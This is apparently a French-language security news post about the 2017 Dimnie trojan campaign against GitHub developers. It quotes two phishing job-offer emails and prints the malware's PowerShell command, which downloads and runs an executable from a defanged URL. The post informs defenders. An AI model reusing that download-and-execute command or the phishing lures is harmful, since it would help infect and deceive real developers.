Cette menace vise les utilisateurs de GitHub

By | March 30, 2017

Les développeurs de GitHub sont ciblés par une campagne mail qui infecte leurs ordinateurs avec un cheval de Troie appelé Dimnie.

Ci-dessous vous verrez deux types de message utilisés dans cette campagne malicieuse :

Hey. I found your software is online. Can you write the code for my project? Terms of reference attached below.
The price shall discuss, if you can make. Answer please.

Hello,
My name is Adam Buchbinder, I saw your GitHub repo and i’m pretty amazed.
The point is that i have an open position in my company and looks like you are a good fit.
Please take a look into attachment to find details about company and job.
Dont hesitate to contact me directly via email highlighted in the document below.
Thanks and regards,
Adam.

Le mode opératoire est le même à chaque fois. Une proposition de travail est offerte au développeur. Puis, celui-ci est invité à télécharger une pièce jointe qui contient toutes les informations sur le travail proposé.
Selon Palo Alto Networks, cette pièce jointe est en réalité une archive contenant un document Word avec un code macro inctégré. Ce code macro, s’il est exécuté, lance une serie de commandes PowerShell qui téléchargera au final le cheval de Troie Dimnie.

serie de commande Powershell

Serie de commandes PowerShell. Source : Palo Alto

cmd.exe /c “powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile(‘hxxp://nicklovegrove.co[.]uk/wp-content/margin2601_onechat_word.exe’,’%appdata%.exe’);start-process ‘%appdata%.exe’

Dimnie est un téléchargeur de malware qui est apparu la première fois en 2014.
Les experts de Palo Alto ont découvert une nouvelle version de ce malware dans la campagne malicieuse qui vise les utilisateurs de GitHub. Cette version a la capacité de dissimuler ses communications vers son serveur de commande et de contrôle à travers des fausses requêtes DNS vers un ancien service de Google, le service PageRank. En conséquence, les chercheurs ne sont pas en mesure de savoir quand le malware a été déployé pour la première fois.

Dimnie possède également une pléthore de nouveaux modules qui s’exécutent tous dans la mémoire, ne laissant aucune trace sur le système de la victime.
Les pirates derrière Dimnie pourraient entre autres, injecter des modules malicieux dans le processus de n’importe quelle application, collecter des données personnelles sur les victimes, enregister les frappes de clavier, effectuer des captures d’écrans.

Plusieurs raisons pourraient expliquer ces attaques. La vaste majorité des développeurs sur GitHub sont également des employés pour des entreprises. Avoir le contrôle de leurs ordinateurs pourrait servir de moyen pour avoir accès au réseau interne de leurs entreprises.
Il est également possible que les auteurs de Dimnie s’intéressent aux référentiels privés de GitHub.
Sur ces référentiels, certaines entreprises choisissent d’y héberger leurs applications. Si les pirates arrivent à avoir accès à ces référentiels, ils pourraient entre autres, faire du chantage, vendre le code source des applications aux concurrents.

mdestroy

Source : paloaltonetworks.com

mdestroy

Leave a Reply

Your email address will not be published. Required fields are marked *